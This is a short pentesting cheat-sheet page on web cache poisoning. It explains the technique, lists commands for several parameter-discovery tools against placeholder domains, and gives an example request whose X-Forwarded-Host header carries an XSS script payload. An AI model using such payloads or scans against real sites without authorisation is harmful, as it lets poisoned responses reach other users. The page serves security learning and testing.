Web Cache Poisoning

General
Web cache poisoning is an advanced technique whereby an attacker exploits the behavior of a web server and cache so that a harmful HTTP response is served to other users.
Fundamentally, web cache poisoning involves two phases. First, the attacker must work out how to elicit a response from the back-end server that inadvertently contains some kind of dangerous payload. Once successful, they need to make sure that their response is cached and subsequently served to the intended victims.
A poisoned web cache can potentially be a devastating means of distributing numerous different attacks, exploiting vulnerabilities such as XSS, JavaScript injection, open redirection, and so on.
Tools
1
# https://github.com/s0md3v/Arjun
2
python3 arjun.py -u https://url.com --get 
3
python3 arjun.py -u https://url.com --post
4
# https://github.com/maK-/parameth
5
python parameth.py -u https://example.com/test.php
6
# https://github.com/devanshbatham/ParamSpider
7
python3 paramspider.py --domain example.com
8
# https://github.com/s0md3v/Parth
9
python3 parth.py -t example.com
Copied!
1
# XSS for users accessing /en?region=uk:
2
GET /en?region=uk HTTP/1.1
3
Host: innocent-website.com
4
X-Forwarded-Host: a."><script>alert(1)</script>"
Copied!
​

CSRF

Broken Links

Last modified 11mo ago

Export as PDF

Copy link

Contents

General

Tools